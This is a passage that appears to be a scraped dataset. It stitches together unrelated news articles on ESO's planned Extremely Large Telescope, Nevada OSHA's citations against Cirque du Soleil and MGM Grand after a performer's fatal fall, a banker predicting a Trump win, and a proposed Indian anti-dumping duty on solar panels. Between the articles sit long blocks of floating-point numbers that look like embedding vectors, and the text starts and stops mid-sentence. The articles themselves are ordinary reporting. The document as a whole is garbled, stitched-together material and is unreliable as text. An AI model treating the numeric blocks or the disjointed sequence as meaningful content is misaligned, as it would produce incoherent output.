possible existence of life. But the smaller and colder a planet is, the more difficult it is to capture its light. Even the VLT is still only capable of detecting hot, giant objects. To address this need, scientists at ESO headquarters in Garching, near Munich, are already planning a successor to the VLT that would be five times as big and many times as powerful: the "Extremely Large Telescope" (ELT). Negotiations are currently underway with Chile and the ESO member countries. A nearby mountaintop within view of Cerro Paranal is already being investigated as a possible site for the ELT -- a lifeless, windswept mound of rock that could serve as the starting point for finding life in the vast expanse of the universe.
[ -0.05630120262503624, -0.005411691032350063, -0.054390739649534225, 0.08712658286094666, 0.1232941672205925, -0.03318232297897339, 0.042668141424655914, 0.0349988155066967, 0.027892518788576126, 0.043909940868616104, -0.02396347001194954, -0.05908882990479469, 0.0060101221315562725, -0.04686007648706436, 0.0393340066075325, -0.013744484633207321, 0.04759789630770683, -0.10515809059143066, -0.01794753596186638, 0.020220810547471046, -0.05459056422114372, 0.06729819625616074, -0.011186460964381695, -0.007102946750819683, 0.012484549544751644, -0.051832038909196854, -0.09127530455589294, 0.000920143851544708, -0.026767265051603317, 0.018096474930644035, 0.017605429515242577, 0.0721113309264183, -0.03648630157113075, 0.009021813981235027, 0.08995410054922104, 0.0291287824511528, 0.052944086492061615, -0.06358707696199417, -0.06519702821969986, -0.015527784824371338, -0.038877930492162704, -0.08177924901247025, 0.01911616511642933, 0.09604302048683167, 0.023782851174473763, -0.0173774603754282, 0.047795072197914124, -0.09379848837852478, -0.059640027582645416, 0.02765096165239811, -0.064874567091465, 0.017277581617236137, 0.04569555073976517, 0.01772824488580227, 0.008613443933427334, 0.0027531993109732866, 0.009535911493003368, -0.08569604158401489, 0.046033233404159546, -0.12936748564243317, 0.011840120889246464, 0.007602607365697622, -0.031133022159337997, -0.05226244777441025, 0.04052343592047691, -0.034110017120838165, 0.017910679802298546, -0.06739573180675507, 0.07333779335021973, 0.006037854123860598, 0.007039874326437712, 0.016735220327973366, -0.029445188120007515, 0.03767496719956398, 0.00018814422946888953, 0.12826098501682281, 0.055549345910549164, -0.019392652437090874, 0.005894841160625219, -0.017372025176882744, 0.14603106677532196, -0.016344532370567322, -0.07589870691299438, 0.08459442108869553, -0.02408359944820404, 0.029153771698474884, -0.03220086917281151, 0.05859552323818207, -0.03119480609893799, -0.03640514984726906, -0.04054449126124382, -0.04563594236969948, -0.0553109385073185, -0.11472669988870621, -0.04725668579339981, 0.023260239511728287, 0.03242860734462738, -0.02809019200503826, 0.11411940306425095, -0.002645621309056878, 0.008455140516161919, -0.004642795771360397, -0.0712941363453865, 0.06290668249130249, -0.035848528146743774, -0.033358488231897354, 0.06687336415052414, 0.11032303422689438, 0.04063164070248604, -0.006102545186877251, -0.0314861461520195, -0.008607141673564911, -0.042864955961704254, -0.019147219136357307, 0.045096505433321, -0.019200030714273453, 0.033342547714710236, 0.059705980122089386, -0.08133942633867264, 0.04280896112322807, -0.04484450817108154, 0.08939468860626221, 0.048057686537504196, 0.04103228449821472, 0.06426645815372467, -0.011526372283697128, -0.09908418357372284, 5.446118959289414e-33, 0.06787999719381332, 0.05548946559429169, 0.12078637629747391, -0.010055314749479294, -0.023531392216682434, -0.04430011659860611, -0.09218604862689972, -0.037568677216768265, 0.020693423226475716, 0.059114400297403336, -0.028414098545908928, 0.02749350294470787, 0.06353430449962616, 0.046970684081315994, 0.013962808065116405, -0.017715152353048325, -0.008411310613155365, 0.02461410127580166, -0.041067104786634445, -0.019627584144473076, -0.08999873697757721, -0.02309931442141533, 0.09482445567846298, -0.04799264296889305, -0.019973961636424065, 0.09057194739580154, 0.058160532265901566, -0.041567493230104446, 0.007145846262574196, -0.025473641231656075, 0.020882515236735344, 0.015091286972165108, -0.04131278395652771, 0.05996059253811836, 0.03703746199607849, -0.007470414042472839, -0.020883804187178612, 0.029278218746185303, 0.02021094411611557, -0.02219299040734768, -0.006136514246463776, 0.03810745105147362, 0.08356135338544846, -0.08569714426994324, 0.0973927229642868, 0.04355863109230995, -0.014593846164643764, 0.04126013070344925, -0.015003684908151627, -0.014181298203766346, 0.005966023076325655, 0.015177084133028984, 0.008706402964890003, 0.001032510888762772, 0.030463412404060364, 0.03373386338353157, 0.039457883685827255, -0.02976020984351635, -0.01540208887308836, 0.05255445837974548, -0.0034814896062016487, -0.020059464499354362, -0.013044686056673527, -0.007831375114619732, -0.048400357365608215, 0.04088364169001579, -0.08926580846309662, -0.03844314068555832, 0.02322453446686268, -0.012989519163966179, -0.028698109090328217, 0.0007423494243994355, 0.046587999910116196, -0.04367370530962944, 0.08620631694793701, 0.0044633615761995316, -0.010863897390663624, -0.025992918759584427, 0.017490684986114502, 0.042377226054668427, -0.03624722361564636, -0.06947103142738342, 0.023321863263845444, -0.060575008392333984, -0.016574792563915253, -0.0338241383433342, -0.08386838436126709, 0.01914806477725506, -0.057967863976955414, 0.0253924373537302, 0.012946250848472118, -0.07958409190177917, -0.04970073699951172, -0.026723148301243782, -0.10798580944538116, -6.932889356997228e-33, -0.007508822716772556, -0.009824815206229687, 0.0236212108284235, -0.053358614444732666, 0.05492357909679413, 0.03149571269750595, -0.08996500819921494, 0.013557679019868374, -0.10058443248271942, -0.034010544419288635, 0.12180114537477493, 0.02612624503672123, 0.005731867626309395, -0.0761420875787735, 0.0007941158255562186, -0.0655207484960556, -0.05288953334093094, 0.07457388937473297, 0.03998196870088577, 0.03780380263924599, -0.0262466911226511, -0.06425248086452484, -0.03951454535126686, -0.022685736417770386, -0.02956310100853443, 0.012069406919181347, 0.0534023679792881, -0.0072995577938854694, -0.02438383921980858, 0.022033166140317917, -0.06231063976883888, 0.03217674046754837, -0.0691935122013092, 0.06486907601356506, 0.051539868116378784, 0.03024972230195999, 0.04486501216888428, 0.009471521712839603, -0.059903137385845184, -0.005965679418295622, -0.06669395416975021, 0.0561547726392746, -0.02423035353422165, -0.0498439259827137, -0.0012032905360683799, 0.010314090177416801, 0.008953850716352463, 0.01130586490035057, -0.01658974401652813, -0.015069911256432533, 0.10559093952178955, -0.036186911165714264, -0.03529128059744835, 0.0037220993544906378, 0.07157520949840546, 0.05805547535419464, -0.044045671820640564, 0.06620556116104126, 0.025928035378456116, 0.011319931596517563, 0.09105426073074341, 0.015565887093544006, 0.02380027063190937, 0.055602721869945526, 0.005479586776345968, -0.06540265679359436, 0.016233360394835472, 0.08237625658512115, -0.07017435878515244, -0.05104973912239075, 0.06626316905021667, -0.024159766733646393, -0.06378373503684998, 0.052400141954422, 0.0470256581902504, 0.022917717695236206, 0.04400287941098213, -0.10439740866422653, 0.010313491337001324, 0.06716129183769226, -0.08783455193042755, -0.030170362442731857, 0.04590623453259468, 0.004241525661200285, 0.10668749362230301, 0.020135648548603058, -0.015231756493449211, -0.06926833093166351, -0.01536489836871624, -0.0956677570939064, -0.007417819928377867, 0.034539200365543365, -0.044642236083745956, 0.04202092066407204, 0.04654625058174133, -6.749518632886975e-8, 0.008588389493525028, -0.016619401052594185, 0.04679308831691742, -0.017087174579501152, -0.0057547083124518394, 0.039849311113357544, 0.07627208530902863, 0.023901404812932014, -0.076651431620121, 0.017728904262185097, 0.03578275442123413, -0.03845204785466194, 0.0791165828704834, -0.014290216378867626, 0.0683230310678482, -0.09777387231588364, 0.056154828518629074, -0.01312276255339384, -0.013615196570754051, 0.0667782723903656, -0.026106124743819237, 0.007913212291896343, 0.059293702244758606, -0.024763520807027817, -0.03357447311282158, -0.02421434409916401, -0.023931173607707024, -0.03038995899260044, 0.07947742938995361, -0.0159006267786026, -0.0048622372560203075, 0.0009574497235007584, -0.04604998603463173, -0.05135975033044815, -0.07660339772701263, -0.05637140944600105, -0.04848352447152138, 0.0382794626057148, -0.05022578686475754, -0.000682992220390588, -0.04022451490163803, 0.0721648782491684, -0.11409097909927368, 0.009973696433007717, 0.0423879399895668, -0.00615406921133399, -0.07237383723258972, -0.03152348846197128, -0.07668132334947586, 0.06708978116512299, 0.026612788438796997, 0.008709868416190147, 0.012352928519248962, -0.11598747223615646, -0.06506434082984924, -0.03980572894215584, -0.09948760271072388, 0.02487706020474434, -0.08382420986890793, 0.04301810637116432, 0.09157969057559967, -0.08598820120096207, -0.02638818882405758, 0.008571448735892773 ]
Nevada OSHA has finished its investigation into the death of Sarah Guillot-Guyard, the Cirque du Soleil performer who fell 94 feet during the climactic scene of Ka on June 29 and later died. OSHA determined that accident happened when the wire rope she was suspended from broke. According to the report, the wire rope “was severed due to the rapid ascent of the performer, ultimately causing the rope to be freed from the sheave/pulley and scraping against a shear point.” OSHA officials cited Cirque du Soleil with six proposed citations and more than $25,000 in fines and MGM Grand with three citations and a $7,000 fine. Cirque du Soleil and MGM are appealing the fines. One of the citations for Cirque du Soleil includes a failure to “protect or prevent ‘Ka’ employees from striking an overhead grid during the ‘Ka’ show at the ‘Ka’ Theater.” Reporting for the Las Vegas Sun, John Katsilometes wrote that “This matches reports from those familiar with the ‘Ka’ staging and fatal incident that Guillot-Guyard did hit the metal grid over the stage as she ascended high above the Final Battle scene, which jarred the rope connecting her to her harness.” Katsilometes also reported that Cirque du Soleil will be appealing the fine: In a statement that also referenced Cirque’s internal review of the incident, [Cirque du Soleil spokeswoman Rene-Claude Menard] said: “Cirque du Soleil completed an exhaustive review of its safety policies and procedures in the wake of the tragic accident involving Sarah. We have redoubled our efforts to ensure the overall diligence and safety of our performers and crew. We have received and reviewed the OSHA citations. We have initiated the appeal process as part of OSHA’s administrative protocol. Safety always has been the top priority for Cirque du Soleil, its performers and crew members.” On the KTNV website, Krista Hostetler listed the citations OSHA has proposed. They are: Summary of Cited Violations Cirque du Soleil: - NRS 618.375 (1): A General Duty Citation was issued because the employer did not protect or prevent KA employees from striking an overhead grid during the KA show at the KA Theater. $7,000 proposed penalty. - The first part of the General Duty Citation was issued because the employer did not provide proper training for the KA Battle Spearman Warrior employee involved in the accident in the use of equipment and tasks used in the Ka show, battle scene at the KA Theater. - The second part was issued because the employer had a Fall Protection Program with construction requirements that do not apply to theater settings because the KA Theater is regulated by Nevada OSHA general industry standards. $7,000 proposed penalty. - 29 CFR 1910.132: This citation was issued because the employer did not properly assess the workplace for hazards that required personal protective equipment at the KA Theater, including opensided floors, bloodborne pathogens and other potentially infectious materials, pyrotechnic dust cleanup, and not finalizing a hazard assessment for the performers. $7,000 proposed penalty. - 29 CFR 1910.132: This citation was issued because the employer did not certify that a workplace hazard assessment had been performed and did not include the date the hazard assessments were conducted. $0 proposed penalty, grouped with the proposed citation above. 29 CFR 1904.32: This citation was issued because the employer did not include on the OSHA Form 300 Log of Injury and Illnesses, the object or substance that directly injured or made a person ill, which prevented a trend analysis and kept the employer from recognizing and conducting employee training involving recurring injuries in accordance with Nevada Revised Statute. $3,300 proposed penalty. Nevada Revised Statute 618.379: This citation was issued because the employer removed equipment from a fatality site on June 29 before Nevada OSHA authorized the dismantling and removal of the equipment (38 feet of wire rope that was attached to the victim at the time of the accident). $935 proposed penalty. MGM Grand Hotel & Casino: - NRS 618.375: This General Duty Citation was issued because MGM Grand employees were exposed to hazards due to deficiencies in the Cirque du Soleil Fall Protection Program with construction requirements that do not apply to theater settings because the KA Theater is regulated by Nevada OSHA general industry standards. - 29 CFR 1910.132: This citation was issued because MGM Grand employees were exposed to hazards due to the deficiencies in Cirque du Soleil hazard assessments for the KA Theater that included opensided floors, bloodborne pathogens and other potentially infectious materials and pyrotechnic dust cleanup. $7,000 proposed penalty. - 29 CFR 1910.132: This citation was issued because MGM Grand employees were exposed to hazards due to deficiencies in the Cirque du Soleil hazard assessments because Cirque du Soleil did not certify that a workplace hazard assessment had been performed and did not include the date the hazard assessments were conducted. $0 proposed penalty, grouped with the proposed citation above.
[ -0.07155264168977737, 0.07684045284986496, -0.021975306794047356, -0.006942023988813162, 0.011304712854325771, 0.03309063985943794, 0.039622366428375244, 0.07588190585374832, 0.01848924718797207, 0.060463014990091324, 0.059159133583307266, -0.04879767820239067, 0.0329698882997036, 0.004349026363343, -0.07046790421009064, -0.0569201335310936, 0.0491395965218544, 0.05860172212123871, -0.06189599633216858, 0.025573784485459328, -0.0003972565464209765, -0.04905496910214424, -0.03566795587539673, -0.00604928657412529, -0.010950056836009026, -0.02144070342183113, -0.11221808940172195, 0.01837802119553089, -0.005334804765880108, -0.07705941796302795, -0.09862641245126724, 0.0041482942178845406, -0.11782369017601013, 0.02640264853835106, 0.050539854913949966, -0.0071310014463961124, -0.027739392593503, -0.003221401944756508, -0.09622839838266373, -0.00271092657931149, 0.039161860942840576, -0.026406025514006615, -0.039453111588954926, -0.002958794590085745, -0.039044588804244995, -0.017146509140729904, -0.01188934501260519, -0.014016766101121902, -0.03094450943171978, 0.06591738015413284, -0.05418863520026207, 0.05150692164897919, 0.09167928248643875, 0.011655098758637905, 0.060935817658901215, -0.10622277855873108, -0.007243577856570482, -0.00022270550834946334, 0.021624809131026268, 0.03843346983194351, 0.018743574619293213, 0.007994772866368294, -0.03313802182674408, 0.04046761989593506, 0.0031693398486822844, -0.06571740657091141, 0.044185444712638855, 0.014758862555027008, -0.0034027802757918835, 0.02424381673336029, 0.043297167867422104, -0.06322980672121048, -0.057910095900297165, -0.05364273115992546, 0.010505390353500843, 0.0919262170791626, -0.03238479048013687, -0.012036877684295177, -0.044900648295879364, 0.010895702987909317, 0.0609278604388237, -0.024173501878976822, 0.010790056549012661, -0.048014767467975616, -0.008601788431406021, 0.012190161272883415, 0.005538527388125658, -0.00412957975640893, 0.06800823658704758, -0.033908993005752563, 0.012434428557753563, 0.05915213003754616, 0.0015535290585830808, -0.011416593566536903, 0.08844723552465439, 0.024559494107961655, -0.15103255212306976, 0.002899967133998871, -0.03314334526658058, -0.01188636478036642, 0.08465610444545746, 0.04620691388845444, 0.02700989693403244, -0.0250571146607399, 0.028479313477873802, -0.013234750367701054, 0.01567545160651207, 0.012669414281845093, -0.05769338831305504, 0.006555053871124983, 0.042946767061948776, 0.09486070275306702, 0.03292498737573624, -0.026349004358053207, 0.10394779592752457, 0.08416880667209625, -0.03720882162451744, 0.042772699147462845, 0.023324090987443924, -0.0750347226858139, 0.0432121641933918, 0.02127518132328987, -0.07812357693910599, 0.028184564784169197, -0.01970534585416317, -0.012179798446595669, 0.023801956325769424, 2.2296971537649004e-33, -0.01334302220493555, 0.01459676306694746, 0.04578384757041931, -0.08525878936052322, 0.099561408162117, -0.013896288350224495, -0.05634414777159691, 0.03454842045903206, -0.02370678447186947, 0.1030329093337059, -0.039414066821336746, -0.04647692292928696, 0.0008712183334864676, -0.12140064686536789, 0.009140171110630035, 0.020440369844436646, 0.06676114350557327, -0.004729474429041147, -0.10059385001659393, -0.0006002677837386727, 0.09087786823511124, 0.013400262221693993, -0.023764081299304962, 0.07289928942918777, -0.07834503054618835, 0.13362102210521698, 0.010449029505252838, -0.03994898498058319, -0.038276609033346176, -0.0048141395673155785, -0.060596268624067307, 0.055421315133571625, 0.08751979470252991, 0.03702646121382713, -0.033915143460035324, 0.01858309656381607, -0.004976838827133179, 0.0007311360677704215, -0.05403362587094307, 0.05144986882805824, -0.07728410512208939, -0.02156069315969944, 0.09419617056846619, -0.03204960376024246, -0.06762319803237915, -0.04856438562273979, 0.04906048998236656, -0.004230109043419361, -0.03149501979351044, 0.01893926039338112, -0.04727944731712341, 0.06415978074073792, 0.010015171952545643, 0.07218318432569504, 0.02125026099383831, 0.16403716802597046, 0.014070399105548859, -0.06424514204263687, 0.04580334201455116, 0.059127792716026306, -0.021747620776295662, 0.06449800729751587, -0.10107500106096268, 0.05995660647749901, -0.01948132924735546, -0.07250826060771942, -0.017169279977679253, -0.023651007562875748, 0.0073957848362624645, -0.02911839634180069, -0.013769975863397121, 0.08131962269544601, -0.012369714677333832, -0.05042630061507225, 0.014360705390572548, -0.00037376119871623814, -0.06416263431310654, 0.04215175285935402, -0.00021301722154021263, 0.02167774736881256, 0.05337145924568176, -0.026800090447068214, 0.0777897834777832, -0.0730556771159172, 0.029300982132554054, -0.031560130417346954, 0.027953943237662315, 0.018657764419913292, -0.024911697953939438, 0.05400769039988518, 0.013497008010745049, -0.023784242570400238, -0.00733286002650857, -0.035987596958875656, -0.01437908224761486, -2.9661158955512546e-33, 0.034703779965639114, -0.010893356055021286, 0.07237279415130615, 0.028514130041003227, 0.0968538224697113, -0.04783042147755623, -0.055944666266441345, -0.010260338895022869, -0.049555324018001556, -0.11776203662157059, -0.02748211659491062, -0.034868791699409485, -0.030128592625260353, 0.07659811526536942, 0.06004737690091133, -0.03953716158866882, 0.01618020236492157, 0.0347730927169323, -0.07143097370862961, 0.02121632918715477, 0.05016350746154785, -0.017202120274305344, -0.038850534707307816, 0.08095917850732803, -0.05331037938594818, 0.034851670265197754, 0.12780043482780457, -0.10385004431009293, -0.07612518221139908, 0.08386250585317612, 0.03175991028547287, 0.005986213218420744, -0.06247098743915558, 0.01626010611653328, 0.011212311685085297, -0.014907843433320522, 0.06191864237189293, 0.036949384957551956, -0.05974547192454338, -0.0426216647028923, 0.06859555840492249, 0.06270581483840942, -0.026371993124485016, 0.018255794420838356, 0.03112335503101349, -0.054235078394412994, -0.065024234354496, -0.06817072629928589, 0.020859073847532272, -0.02155500277876854, -0.0554015152156353, -0.0037571305874735117, -0.038399551063776016, 0.0870789885520935, 0.015466625802218914, 0.012286019511520863, 0.024384960532188416, -0.04760560020804405, -0.04083814471960068, -0.02555900625884533, -0.0010390495881438255, 0.012942720204591751, -0.05954749882221222, -0.014594766311347485, 0.09580729901790619, -0.0034949975088238716, -0.014646596275269985, -0.05701331049203873, -0.04007788747549057, -0.014663186855614185, -0.0011862351093441248, 0.06810025125741959, -0.04506166651844978, -0.0957123339176178, 0.0028680029790848494, 0.03982376307249069, -0.0514916367828846, 0.11130386590957642, -0.0021716668270528316, 0.03055739402770996, 0.04501938447356224, -0.13740253448486328, -0.03866344690322876, -0.005496237892657518, 0.006007016636431217, 0.04676875099539757, 0.06646306812763214, -0.06614911556243896, -0.006533380132168531, -0.03349955379962921, -0.03748008981347084, -0.06176696717739105, 0.021987590938806534, 0.0732664167881012, -0.040097080171108246, -5.1324072103398066e-8, -0.08447746932506561, 0.12423304468393326, -0.12839855253696442, -0.03346581012010574, 0.0048699090257287025, -0.004059822764247656, 0.01706688106060028, 0.01840607076883316, -0.06523317098617554, 0.04303399845957756, 0.015192342922091484, 0.007684207521378994, 0.05126795545220375, 0.025302963331341743, -0.019056621938943863, -0.024707810953259468, 0.0030453158542513847, 0.012719227932393551, 0.025239836424589157, 0.05371508374810219, 0.047238513827323914, 0.003834970761090517, 0.038546379655599594, 0.019983630627393723, -0.06181308999657631, 0.04541177302598953, 0.005525813437998295, 0.05000610277056694, 0.034783992916345596, 0.04465027153491974, -0.07140932977199554, -0.02112470380961895, -0.04857811704277992, -0.04350721091032028, -0.010884243994951248, -0.007509307004511356, 0.08113114535808563, 0.0006859733839519322, 0.05800016224384308, 0.049202751368284225, -0.028747880831360817, 0.019926639273762703, 0.03580848500132561, 0.03143106773495674, 0.040399469435214996, -0.00021746876882389188, -0.09998289495706558, -0.07131819427013397, -0.03544202446937561, -0.03441775590181351, -0.00640842504799366, 0.0008056769147515297, -0.02444554679095745, 0.06859232485294342, 0.0692322850227356, -0.02200828120112419, 0.07556905597448349, 0.0202697291970253, -0.06815531104803085, 0.031652580946683884, -0.00833797175437212, -0.10771617293357849, -0.012925059534609318, 0.05503363907337189 ]
Donald Trump has been having a rough time rounding up support from Wall Street, but one big financier said Wednesday the real estate tycoon will ride an anti-establishment wave to take the presidency. "The country is in a desperate desire for change," said Ken Moelis, a major player in the investment banking industry as head of Moelis & Co. "I'm predicting that Donald Trump will win the election." "We haven't elected a president since George H.W. Bush based on competency," Moelis added during an appearance at a Bloomberg conference. Moelis didn't say whether he backs Trump. Though Trump over the course of his career has made plenty of friends in the banking industry, he's failed to capture a lot of high-profile endorsements. Billionaire investor Carl Icahn, vulture capitalist Wilbur Ross and former GE CEO Jack Welch lead a small cadre of Wall Street support for the Republican nominee. The conference has seen several speakers talk politics so far, with economist Glenn Hubbard at Columbia Business School offering some additional Trump support. "Directionally, he's on the playing field. Mrs. Clinton is not on the playing field if that field is economic growth," said Hubbard, a George W. Bush administration figure tied to controversial tax cuts on dividends. Hubbard called Trump "a little undisciplined" and said he should better "articulate a general vision for growth." Wall Street has poured money into Democrat Hillary Clinton's campaign but has held off on cutting many big checks for Trump. Clinton has pulled in $58.5 million from the finance industry, while Trump has taken in about $557,000, according to the Center for Responsive Politics.
[ -0.02247549779713154, -0.08644363284111023, -0.01940746419131756, -0.06510999798774719, -0.029416261240839958, -0.025238163769245148, 0.10025359690189362, 0.02130310609936714, -0.006252508144825697, -0.10417363047599792, -0.0742223933339119, 0.022901570424437523, -0.004551776219159365, -0.006567568983882666, -0.026054905727505684, 0.011092988774180412, 0.017294595018029213, -0.044482748955488205, -0.032738301903009415, 0.06332464516162872, -0.055812448263168335, -0.04144199937582016, -0.026303192600607872, -0.09178286045789719, -0.027960501611232758, -0.027091169729828835, 0.06825268268585205, -0.02237359993159771, -0.06194540113210678, -0.03196405619382858, 0.08608553558588028, -0.025897031649947166, 0.01397923193871975, -0.028854165226221085, 0.049434758722782135, 0.03631371632218361, 0.025491900742053986, 0.09083479642868042, 0.07149996608495712, -0.02119331806898117, 0.0808548554778099, -0.07888147979974747, -0.02598031796514988, -0.03363026678562164, 0.04042612388730049, -0.05671737343072891, 0.04187594726681709, -0.007446395233273506, 0.04052835330367088, -0.035245176404714584, -0.1131238117814064, 0.05242539942264557, 0.06296020746231079, -0.03555852919816971, -0.010755475610494614, 0.08727158606052399, -0.0028405894991010427, 0.0078041269443929195, 0.0019653039053082466, -0.04011695459485054, 0.02567163109779358, -0.025385446846485138, 0.04807612672448158, -0.015204436145722866, 0.06396229565143585, -0.0004563576076179743, -0.056853484362363815, 0.011381596326828003, -0.059971489012241364, -0.02761809341609478, 0.1075461208820343, -0.014048850163817406, -0.07136859744787216, 0.005583710502833128, 0.023113155737519264, 0.025130752474069595, 0.08999763429164886, 0.02919073775410652, 0.10996230691671371, -0.007451821584254503, 0.04084285721182823, 0.02757302112877369, -0.05233292654156685, -0.04024561122059822, -0.04306485131382942, 0.050644513219594955, -0.037616219371557236, -0.022968648001551628, 0.01583891548216343, 0.022321000695228577, 0.037946704775094986, -0.05416009947657585, -0.057969942688941956, -0.0371791236102581, -0.017715370282530785, -0.0051811737939715385, -0.05405784770846367, -0.013005311600863934, -0.08511204272508621, 0.08732050657272339, -0.005296485032886267, 0.04785872995853424, 0.0833914577960968, 0.022745009511709213, -0.03358319401741028, 0.020014815032482147, -0.01338859461247921, 0.08474822342395782, 0.0755053386092186, 0.0018431528005748987, 0.002199354348704219, 0.04120175540447235, -0.0381767675280571, -0.01876206323504448, -0.05582917109131813, -0.033181969076395035, -0.0413505882024765, -0.07894793152809143, -0.03700467571616173, -0.016878262162208557, 0.07006249576807022, 0.1239824891090393, -0.06025894731283188, 0.02488873526453972, -0.037955962121486664, -0.047221291810274124, -0.04924637824296951, 5.350621430886627e-33, -0.0472419373691082, -0.017119809985160828, 0.03458542376756668, 0.012767767533659935, -0.04104102402925491, 0.07616398483514786, -0.05735452473163605, -0.05594261735677719, -0.03289993479847908, -0.022218892350792885, -0.10276789963245392, 0.04616658762097359, -0.00220550992526114, 0.02670370042324066, -0.02317153476178646, -0.006415847223252058, -0.06316995620727539, -0.010717825964093208, 0.0007093953900039196, -0.016757823526859283, 0.1136268749833107, 0.052587997168302536, -0.010856559500098228, -0.005032956134527922, 0.0812331885099411, -0.060281336307525635, 0.03911812603473663, 0.026330849155783653, -0.0098077692091465, 0.0377255342900753, -0.05203833058476448, -0.02927361987531185, -0.039217595010995865, 0.01585680991411209, -0.001973296981304884, -0.034559015184640884, -0.08864891529083252, -0.05447328835725784, -0.012702349573373795, -0.040584854781627655, -0.07723770290613174, 0.11839280277490616, 0.007744499947875738, 0.09879754483699799, -0.030141882598400116, 0.026972999796271324, 0.08389498293399811, 0.059127338230609894, -0.018549220636487007, -0.02883848175406456, 0.03483448922634125, -0.026952171698212624, -0.020294521003961563, -0.05350279435515404, -0.04035278037190437, -0.07827725261449814, -0.03404269739985466, -0.02025763690471649, 0.07178482413291931, -0.05016430467367172, 0.03838197514414787, 0.02300696074962616, -0.17386886477470398, 0.1042729839682579, -0.1398080438375473, 0.04582471027970314, 0.009012498892843723, 0.044792551547288895, -0.007244824897497892, 0.062090080231428146, 0.0705343633890152, -0.006505247671157122, -0.005820760503411293, 0.018441224470734596, -0.06027863547205925, -0.027496781200170517, 0.0032120842952281237, 0.01155151054263115, 0.06654514372348785, 0.017469171434640884, 0.033009082078933716, -0.04179486632347107, 0.1305980533361435, 0.012750237248837948, -0.016818560659885406, 0.07257293164730072, 0.04551035538315773, -0.03940426558256149, 0.0069112274795770645, 0.023778071627020836, -0.047860778868198395, -0.011759291402995586, 0.002547779818996787, 0.02071530558168888, -0.07760041952133179, -6.227144589282605e-33, -0.07737013697624207, -0.07570331543684006, 0.06948491930961609, -0.029345249757170677, -0.008516548201441765, 0.008987127803266048, 0.0453144907951355, -0.030859367921948433, 0.027166105806827545, -0.11211434006690979, 0.0164107047021389, 0.04152240976691246, 0.06432932615280151, 0.03733515366911888, 0.008268519304692745, -0.042062822729349136, 0.03623909875750542, -0.04182105138897896, -0.03608669340610504, 0.008288208395242691, 0.03321894630789757, 0.06545098125934601, -0.08305463939905167, 0.07292339205741882, -0.09901238977909088, -0.010199015028774738, 0.09013237804174423, -0.013091041706502438, -0.010399045422673225, 0.03152018412947655, -0.08135706931352615, 0.03336723521351814, -0.03469345346093178, 0.029110096395015717, 0.03710506483912468, 0.10391256958246231, 0.028996992856264114, -0.05895154923200607, -0.054828941822052, -0.0301144290715456, 0.10005810856819153, 0.028217745944857597, -0.012942936271429062, 0.016211695969104767, -0.015401092357933521, 0.0966622531414032, -0.023155981674790382, 0.028952747583389282, 0.0013915542513132095, 0.036705199629068375, -0.03956093266606331, 0.0628565177321434, -0.023056354373693466, 0.05553985387086868, -0.03095060959458351, -0.005933850072324276, 0.02569032832980156, 0.008205235004425049, -0.032249704003334045, 0.04976709187030792, -0.06732789427042007, 0.014642092399299145, 0.12840348482131958, -0.033682141453027725, -0.010608700104057789, 0.01916850358247757, -0.05943577364087105, -0.031203070655465126, 0.014505300670862198, -0.07489252090454102, 0.01848435215651989, -0.06149214133620262, -0.017517179250717163, -0.0732734426856041, -0.018261130899190903, 0.14004001021385193, -0.05655759572982788, -0.06862086057662964, 0.02080395072698593, 0.07471473515033722, 0.000938093289732933, -0.014935956336557865, -0.0030364098493009806, -0.03319563716650009, 0.03641651198267937, 0.03322558104991913, -0.032747093588113785, -0.026531169191002846, -0.021259278059005737, 0.042440276592969894, 0.01643179915845394, -0.040171876549720764, 0.005218598060309887, -0.05262942239642143, -0.07835555821657181, -6.4623243645201e-8, -0.020860986784100533, -0.0020107764285057783, 0.04387464374303818, -0.014522471465170383, -0.043231792747974396, -0.0027586817741394043, -0.01877911016345024, -0.13919004797935486, 0.10647589713335037, 0.06749924272298813, 0.10314876586198807, 0.01978488638997078, -0.12339184433221817, -0.04973902925848961, -0.02250484935939312, -0.005053604952991009, -0.050150152295827866, -0.029806625097990036, -0.016106823459267616, 0.009504980407655239, 0.01409617904573679, 0.0681915283203125, -0.006067081820219755, 0.042621366679668427, 0.07211398333311081, -0.04640314355492592, -0.03894627466797829, 0.00526614161208272, 0.034552160650491714, 0.016162000596523285, -0.026997005566954613, -0.005588655825704336, -0.02123485691845417, -0.021598150953650475, 0.08170092850923538, -0.002568410011008382, 0.023954428732395172, 0.03867102414369583, 0.08615400642156601, 0.04378913342952728, 0.014148817397654057, -0.03705427423119545, 0.027625128626823425, -0.015031600371003151, -0.016199391335248947, -0.03731695935130119, -0.0353688970208168, 0.028486786410212517, 0.07220237702131271, -0.015834609046578407, -0.038473159074783325, -0.023399369791150093, 0.05388636514544487, -0.04582491144537926, 0.03698975592851639, -0.03287162259221077, -0.06147230416536331, -0.03080981783568859, -0.04251910746097565, -0.0014708845410495996, 0.01681327261030674, -0.08078067004680634, 0.024158265441656113, 0.07251657545566559 ]
India’s solar power sector is staring at yet another policy intervention that could put the viability of projects in the country under question. The Narendra Modi government is expected to impose an anti-dumping duty (ADD) on imported solar panels in order to boost sales of locally made ones. This is bound to increase the costs of setting up power plants as 89% of the solar panels used in India are imported, mostly from China, Taiwan, and Malaysia whose products are around 10% cheaper than locally made ones. “If the anti-dumping duty is imposed—which is likely, very strongly likely—then it will make life easier for domestic producers (of solar panels),” said Amit Kumar, a partner at consulting firm PwC, who focuses on the renewables sector. An ADD of, say, 25% will allow a similar hike in prices of local products, too, bringing down the homegrown firms’ losses, Kumar added. But that’s bad news for India’s solar power producers. In the last few months, activity in India’s solar energy sector has stalled. The industry is struggling with rising solar panel prices and flat power demand, while, on its part, the government hasn’t held auctions for solar projects. The sector is lagging India’s target of installing 100 gigawatts (GW, or 1,000 megawatts) of plants by 2022. The ADD is likely to make projects even less viable. Developers are already being forced to quote low tariffs to win the few available projects, risking low returns, and an increase in costs due to the duties would add even more pressure. The backstory In July, the India Solar Manufacturers Association (ISMA), a group of firms that make solar modules, filed a petition with the government to probe solar cell and module imports. Typically, the government takes around a year to act—impose duties if necessary—on such pleas. It may also choose to impose a provisional duty while the probe is on. In the past, such provisional duties have been brought in around seven months after a petition is filed, according to renewable energy consultancy firm Bridge to India (BTI). This year, such an intervention may already be around the corner. “(There) is a very strong buzz in the industry that a duty announcement is about to come anytime now,” BTI said in a Nov. 15 report (pdf). “The government is under pressure about the poor state of manufacturing…If DGAD (Directorate General of Anti-Dumping & Allied Duty) and the ministry of finance are sympathetic to the case, it is certainly possible that a provisional or anti-dumping duty may be imposed imminently.” Buyer’s drought A hefty ADD could potentially leave power producers without enough buyers. “If the duty is very sharp, the tariff will go up very sharply and…the discoms (distribution companies) will not buy 